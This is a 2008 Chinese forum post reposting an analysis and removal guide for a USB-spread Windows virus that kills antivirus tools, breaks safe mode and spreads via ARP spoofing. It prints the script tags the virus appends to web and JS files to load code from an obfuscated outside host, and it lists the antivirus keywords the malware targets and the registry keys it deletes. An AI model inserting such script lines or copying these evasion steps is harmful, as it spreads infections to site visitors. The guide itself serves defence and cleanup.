|
|
发表于 2008-2-23 16:29:29| 字数 4,983| - 中国–湖北–武汉 联通
|
显示全部楼层
我最近出现了跟你一样的情况,参考这篇文章:
网页病毒 QQ木马“百万Q币等你拿”“QQ中奖”杀软失效,系统重起优盘(U盘)病毒,完全解决方案!
作者:admin 日期:2008-02-02
字体大小: 小 中 大
您的电脑是否有以下症状:
1,你是否遇到过那种上网的时候,整个网页顶部出现QQ类似的广告,右下角出现"百万Q币等你拿"之类的仿腾讯消息广告?
2,系统中了U盘病毒,360打不开,卡巴斯基,瑞星,江明等杀毒软件瘫痪。
3,网络时通时断。
4,安全模式进不去,开机自动重起。
那么恭喜你!你已经中了2007-2008年度的高科技木马+高科技病毒。我们暂时将其定义为:百万Q币病毒,其实是“磁碟机变种”。
首先请大家不要慌张,经过大概1天半的,已经把此问题给解决了(并不像其他朋友那样需要格式化全盘)。
首先我们来说说出现这种情况的原因:
此毒为磁碟机变种,这个变种基本上能把大多数的安全工具给枪毙了,导致几乎全部不能使用,并且感染exe(包括rar中的exe文件)html等网页文件,js脚本文件,且十分顽固,采用进线程相互守护等多种技术,可谓罪恶多端的一个病毒。
下面为此病毒的简要分析和查杀方法
File: pagefile.pif
Size: 88576 bytes
Modified: 2007年12月28日, 16:55:16
MD5: 2C6F3E41B1E909E795B5BCE70B3A44CC
SHA1: 3809D504ABC65D891CB0281BD9B599EA265C406C
CRC32: 225B0B61
1.病毒运行后,生成如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe
或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面
netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
dnsq.dll会插入一些进程,并监控C:\WINDOWS\system32\Com\LSASS.EXE,如果该进程被结束,则立即恢复。
而且会监控~.exe,如果该文件被删除,立即重写。
894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动,该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf
2.通过查找窗口文字和和获得窗口线程进程ID等函数(GetWindowThreadProcessID)监控指定文字的窗口,之后会发送消息关闭窗口或者通过Terminate process函数结束进程,可能涉及的关键字如下:
avast
firewall
狙剑
bitdefender
escan
ewido
*升级
sreng 介绍
monitor
微点
费尔
antivir
金山
360anti
360safe
avg
dr.web
云
墙
升
瑞
mcagent
最终的结果是很多安全工具和杀毒软件不能使用,包括我们常用的Xdelbox,sreng,Icesword以及Icesword修改版...
该部分具体分析还请各位大大们指点...
3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts
C:\boot.ini不能写则Xdelbox等软件被废掉。
4.破坏安全模式
删除如下键
HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer(和安全模式有关?)
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键
6.破坏显示隐藏文件
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0x00000000
7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件
8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*"></script>的代码
感染js等脚本文件
在其尾部加入document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*'></sCrIpT>");的代码。
解决方案:
预备工具:1,360安全卫士的U盘查杀工具:http://dl.360safe.com/killer_autorun.exe
2,sreng:http://download.kztechs.com/files/sreng2.zip
3,Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
1,状态:
网页有“百万Q币等你拿”之类的仿QQ信息,但你的杀毒软件能用。安全模式能进去。
处理方法:你还没有中毒,不用担心。(或许你会问了为何还没有中毒了明明打开网页里有QQ广告,但是我告诉你确实没有中毒。之所以造成这种状况,是因为你肯定是在一个小的局域网上万,绝非独立的ADSL。比如你在公司,或者学校,就很容易由这种情况。这时候出现这种现象是因为和你同意局域网的人电脑中了这个“百万Q 币病毒”--磁碟机变种,在攻击局域网的网关,并把自己的主机伪装成网关IP,所以你一打开网页,就会连接到病毒主机,而此时你所访问的外网网页数据包,不是直接通过网关发给你的,而是那台中了毒的主机,很现在这个主机发给你的网页是在正常的网页的首部和尾部加入了两个java script代码文件,这两个文件在你的机器上表现出来就是你所看到的网页顶部的QQ广告和右下角的QQ中奖图标。)所以如果你遇到这种情况请立即安装ARP防火墙,然后绑定 MAC(具体操作我以后会写文章详细说明,此略),然后叫网络管理员进行全网段杀毒,监听病毒主机,大家都安装ARP防火墙就没事了。作者是在校内,学校网络中心很懒,所以很少看到他们积极解决,都是我们自己查找病毒主机然后挨个去敲门叫他们装ARP防火墙然后杀毒。
2, 状态:
电脑中的杀毒软件,全部不能用。电脑重起。不能进安全模式。网页也出现QQ中奖图标。(恭喜你,你是真的中招了)
处理方法:
除非你是绝对的高人,否则,我还是劝你把C盘格式化了,重新装一个系统:
(1),格式化C盘,最好是用GHOST工具,然后把其他盘设置成为隐藏。
(2),肯定是装系统在C盘拉,装的时候还是N年前的老规矩,断网啦!
(3),装好系统后。因为 经过之前的分析发现,此病毒十分顽固,但貌似强大的病毒背后却有着致命的弱点,它只通过~.exe启动自身,没有其他启动项,所以我们完全可以通过映像劫持处理这个病毒。
a,将下列文字复制到记事本中,并保存为reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~.exe]
"Debugger"="清新阳光"
双击导入注册表
重启计算机
b,重启后我们会发现病毒被困死了^_^,但是记住此时千万不要不可打开其他盘,文件,程序。就连我的电脑也不要打开。
现在可以轻松的灭掉它们了
打开Icesword
点击左下角文件 按钮
删除如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe(一定不要忘记)
或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe
以及各个分区下面的pagefile.pif和autorun.inf
c.打开sreng
系统修复 - Windows Shell/Ie 全选 - 修复
系统修复 - 高级修复 修复安全模式
系统修复 — 浏览器加载项
删除[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
d.使用杀毒软件全盘杀毒,修复受感染的exe文件(如果杀毒软件暂不能认出这个病毒,请暂时不要打开非系统分区下的exe以及压缩包内的exe文件!!!)
e.修复受感染的htm等网页文件
f,用360U盘杀毒,杀完之后会出现一个问你是否修复镜像劫持,千万记住一定要选择否。不然千辛万苦才杀完的,就会功亏一溃。
(1),如果你用GHOST工具把其他盘隐藏了的话,在你做了镜像劫持之后,要把其他盘显示出来。不然怎么能把其他盘的毒杀掉呢?
注意事项:1,在你的局域网环境ARP攻击严重的情况下,千万不要用瑞星下载微软的那个补丁。因为这种情况下容易,瑞星下载的微软补丁可能是被劫持了的。虽然名次是和补丁名字一样,但是却是下载的病毒文件。建议让微软自己安装,或者用360下载。不然刚杀完读,又被你的杀软下载了病毒下来。
2,平时下载文件的时候,一定要看清楚文件的大小和来处。要是不是直接从你看到的连接上下载的文件,或者大小不对,文件名字不对,千万不要下载。因为容易在下载的时候也被劫持。然后就会出现下载”setup.exe”的文件,这个一般来说,在这种情况下都是病毒。
所以从以上看来。中毒的,出现此种情况的基本上是局域网,尤其是在学校。基本上的学校内部局域网都种了这种毒。非局域网,比如直接用ADSL,一个人上网的则很少出现这种问题。
所以在学校或者企业的网络部网络中心工作的网管同志,应该做好局域网的ARP攻击防范,认真对待ARP病毒。 |
|
狗仔卡
离线
提升卡
置顶卡
变色卡
